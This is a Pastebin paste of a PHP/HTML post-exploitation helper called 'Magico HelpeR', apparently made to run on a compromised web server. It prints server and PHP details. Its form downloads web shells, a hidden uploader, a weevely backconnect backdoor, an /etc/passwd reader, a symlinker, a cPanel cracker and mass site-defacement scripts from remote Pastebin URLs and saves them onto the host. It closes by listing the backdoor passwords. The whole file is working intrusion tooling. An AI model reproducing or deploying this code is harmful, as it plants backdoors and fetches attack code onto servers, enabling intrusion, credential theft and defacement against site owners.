Advertisement
Elmagico

magico-helper

Aug 14th, 2015
1,789
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.85 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta content="text/html; charset=ISO-8859-1"
  4. http-equiv="content-type">
  5. <title>.:! Magico HelpeR !:.</title>
  6. </head>
  7. <body style="background-color: black; color: rgb(0, 0, 0);"
  8. alink="#ee0000" link="#0000ee" vlink="#551a8b">
  9. <div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span
  10. style="color: rgb(51, 204, 0); font-weight: bold;"><span
  11. style="color: rgb(153, 153, 0);">.:!~@</span># </span><span
  12. style="color: red; font-weight: bold;"><a href="https://www.facebook.com/magico.sec">Magico Helper</a></span><span
  13. style="font-weight: bold;"> </span><span
  14. style="color: rgb(51, 204, 0); font-weight: bold;">#<span
  15. style="color: rgb(153, 153, 0);">@~!:.</span></span><span
  16. style="color: white;"></span>
  17. <span style="font-weight: bold;"></span><br>
  18. <span style="font-weight: bold;"><img
  19. style="width: 239px; height: 186px;" alt=""
  20. src="http://localhost/d.jpg"></span><br>
  21. <span style="font-weight: bold;"></span><small><span
  22. style="color: rgb(0, 153, 0);"><big><small><b>.: <span
  23. style="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>
  24. <small><span style="color: rgb(0, 153, 0);"><big>
  25. <small>---------------------------------------------------------------------------------------<br>
  26. <?php
  27. set_time_limit(0);
  28. error_reporting(0);
  29. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Software   : </span></b>".$_SERVER['SERVER_SOFTWARE']."<br>";
  30. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Admin      : </span></b>".$_SERVER['SERVER_ADMIN']."<br>";
  31. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> User              : </span></b>".get_current_user()."<br>";
  32. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server IP         : </span></b>".$_SERVER['SERVER_ADDR']."<br>";
  33. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Your IP           : </span></b>".$_SERVER["REMOTE_ADDR"]."<br>";
  34. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Uname             : </span></b>".php_uname()."<br>";
  35. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Php version       : </span></b>".phpversion()."<br>";
  36. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Dir               : </span></b>".getcwd()."<br>";
  37. ////////////////////////////////////
  38. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Safe Mode         : </span></b>";
  39.     if(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on'){
  40.         echo "<span style=\"font-weight: bold; color: red;\">On</span>";
  41.        
  42.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>"; }
  43. echo "<br>";
  44. //////////////////////////////////
  45. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Curl                 :</span></b>";
  46.     if(function_exists("curl_version")){
  47.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  48.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  49.  
  50. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Perl                 :</span></b>";
  51.     if(function_exists("perl -h")){
  52.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  53.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  54.  
  55. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Python                 :</span></b>";
  56.     if(function_exists("python -h")){
  57.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  58.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  59.    
  60. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Bash                 :</span></b>";
  61.     if(function_exists("bash -h")){
  62.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  63.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  64.  
  65. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mysql                 :</span></b>";
  66.     if(function_exists("mysql_connect")){
  67.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  68.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  69.    
  70. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mssql                 :</span></b>";
  71.     if(function_exists("mssql_connect")){
  72.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  73.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  74.  
  75. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Oracle                 :</span></b>";
  76.     if(function_exists("ocilogon")){
  77.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  78.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  79.    
  80. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Postgrase                 :</span></b>";
  81.     if(function_exists("pg_connect")){
  82.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  83.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  84.  
  85. //////////////////////////////////
  86. echo "<br><b>[#]<span style=\"color: rgb(51, 204, 0);\"> Disable_functions  : </span></b>";
  87.  
  88.     $disable_funs = @ini_get('disable_functions');
  89.     $arr = explode(',', $disable_funs);
  90.     foreach($arr as $fun){
  91.         echo "<span style=\"font-weight: bold; color: red;\">$fun</span>"." - ";
  92.     }
  93.  
  94.  
  95. /* or
  96.     $funs =array("system","exec","shell_exec","passthru","ln","copy","symlink","show_source","mail");
  97.         foreach($funs as $fun){
  98.             if(!function_exists($fun)){
  99.                 echo $fun." - ";
  100.             }
  101.         }*/
  102. //////////////////////////////
  103. echo"<br>";
  104. echo"---------------------------------------------------------------------------------------------------------------------------------------------------<br><br>";
  105. echo'<form method="post">
  106. <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Tools Grabber : <b></span><select name="tools" >
  107. <option>===================</option>
  108. <option>hidden uploader</option>
  109. <option>k2ll33d shell</option>
  110. <option>x shell</option>
  111. <option>webr00t</option>
  112. <option>fwso shell</option>
  113. <option>awso shell</option>
  114. <option>mass</option>
  115. <option>/etc/passwd</option>
  116. <option>server users</option>
  117. <option>backconnect weevely</option>
  118. <option>turbo cpanel</option>
  119. <option>symlinker</option>
  120. <option>adminer</option>
  121. <option>mailer</option>
  122. <option>Magico pws</option>
  123. <option>safe mode</option>
  124. <option>404 shell</option>
  125. <option>wp mass info changer</option>
  126. <option>jo mass info changer</option>
  127.  
  128. </select>
  129. <input type="submit" name="get" value="Get" />
  130. </form>';
  131. /////////////////////////////////////////////////////////////////
  132. if(isset($_POST['get'])){
  133.     switch($_POST['tools']){
  134.    
  135.         case "x shell":
  136.         echo gino('http://pastebin.com/raw.php?i=vYzbTTs8','oop.php');
  137.         break;
  138.         //////////////////////////////////////////////
  139.         case "webr00t":
  140.         echo gino('http://pastebin.com/raw.php?i=N5q1T1SH','r00t.php');
  141.         break;
  142.         //////////////////////////////////////////////
  143.         case "hidden uploader":
  144.         echo gino('http://pastebin.com/raw.php?i=gtKnzWyB','upx.php');
  145.         break;
  146.         //////////////////////////////////////////////
  147.         case "awso shell":
  148.         echo gino('http://pastebin.com/raw.php?i=0USmsjpW','awso.php');
  149.         break; 
  150.         //////////////////////////////////////////////
  151.         case "mass":
  152.         echo gino('http://pastebin.com/raw.php?i=KbMUxa0c','mass.php');
  153.         break; 
  154.         //////////////////////////////////////////////
  155.         case "/etc/passwd":
  156.         echo gino('http://pastebin.com/raw.php?i=KbwUY0aR','passwd.php');
  157.         break;     
  158.         //////////////////////////////////////////////
  159.         case "k2ll33d shell":
  160.         echo gino('http://pastebin.com/raw.php?i=8mwwA4V2','k.php');
  161.         break;             
  162.         //////////////////////////////////////////////
  163.         case "fwso shell":
  164.         echo gino('http://pastebin.com/raw.php?i=f2VWCsNY','fwso.php');
  165.         break;         
  166.         //////////////////////////////////////////////
  167.         case "adminer":
  168.         echo gino('http://pastebin.com/raw.php?i=BZHXtZqu','adminer.php');
  169.         break; 
  170.         //////////////////////////////////////////////
  171.         case "backconnect weevely":
  172.         echo gino('http://pastebin.com/raw.php?i=6YkfqzQ1','bc.php');
  173.         break;         
  174.         //////////////////////////////////////////////
  175.         case "turbo cpanel":
  176.         echo gino('http://pastebin.com/raw.php?i=svbEfUPF','turbo.php');
  177.         break;         
  178.         //////////////////////////////////////////////
  179.         case "symlinker":
  180.         echo gino('http://pastebin.com/raw.php?i=NX74fQQU','symv4.php');
  181.         break;     
  182.         //////////////////////////////////////////////
  183.         case "server users":
  184.         echo gino('http://pastebin.com/raw.php?i=5VKD1nEk','users.php');
  185.         break;         
  186.         //////////////////////////////////////////////
  187.         case "mailer":
  188.         echo gino('http://pastebin.com/raw.php?i=9zzgByV6','wp-mailer.php');
  189.         break;
  190.         //////////////////////////////////////////////
  191.         case "Magico pws":
  192.         echo gino('http://pastebin.com/raw.php?i=5EUWbPRv','pws.php');
  193.         break;
  194.         //////////////////////////////////////////////
  195.         case "safe mode":
  196.         echo gino('http://pastebin.com/raw.php?i=Te1e1uhA','php.ini');
  197.         break;
  198.         //////////////////////////////////////////////
  199.         case "404 shell":
  200.         echo gino('http://pastebin.com/raw.php?i=6caNG1Jf','404.php');
  201.         break;     
  202.         //////////////////////////////////////////////
  203.         case "wp mass info changer":
  204.         echo gino('http://pastebin.com/raw.php?i=v55JUXQp','wp-masser.php');
  205.         break;
  206.         //////////////////////////////////////////////
  207.         case "jo mass info changer":
  208.         echo gino('http://pastebin.com/raw.php?i=sjrCVapz','jo-masser.php');
  209.         break;
  210.                
  211.    
  212.         } // switch end
  213. }// end if
  214. ////////////////////////////////////////////////////////////////
  215. // by INJECTOR_MA
  216. function gino($input,$output){
  217.     @mkdir('gino');
  218.     @chdir('./gino');
  219.    
  220.     if(!file_exists($output)){
  221.        
  222.     $cn = @file_get_contents($input);
  223.     $save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save);
  224.     return "<br>[#]DoNe: <a href=\"./gino/$output\"> Go to Here </a>";
  225.     }else{ return "<br>[#] Allready Here : <a href=\"./gino/$output\"> Go to Here </a>"; }
  226.    
  227. }              
  228. ///////////////////////////////////////////////////////////////
  229.  
  230. ?>
  231.  
  232. <br><br><br><br>
  233. <span style="color: rgb(0, 153, 0);">[#]</span> <span
  234. style="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span
  235. style="color: rgb(153, 51, 153);">Please
  236. Notice</span> :</span> the password of the <span
  237. style="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span
  238. style="color: rgb(153, 153, 0);">123456</span></span>
  239. <br>
  240. <span
  241. style="color: rgb(0, 153, 0);">[#] the user of [<span
  242. style="color: rgb(51, 204, 0);"> fwso shell</span>
  243. ] is <span style="color: rgb(153, 153, 0);">magico</span> and the
  244. password is <span style="color: rgb(153, 153, 0);">xmagico</span></span>
  245. <span style="color: rgb(0, 153, 0);"></span>
  246. <br>
  247. <span style="color: rgb(0, 153, 0);">[#] to view <span
  248. style="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span
  249. style="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>
  250. <span style="color: rgb(0, 153, 0);">[#] The Pass of <span
  251. style="color: rgb(51, 204, 0);">404 shell</span> is</span><span
  252. style="color: rgb(255, 204, 51);"> <span
  253. style="color: rgb(204, 153, 51);">xmagico</span></span>
  254. <br><b>...::::::: https://www.facebook.com/magico.sec ::::::::...</b>
  255.  
  256. </big></span></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement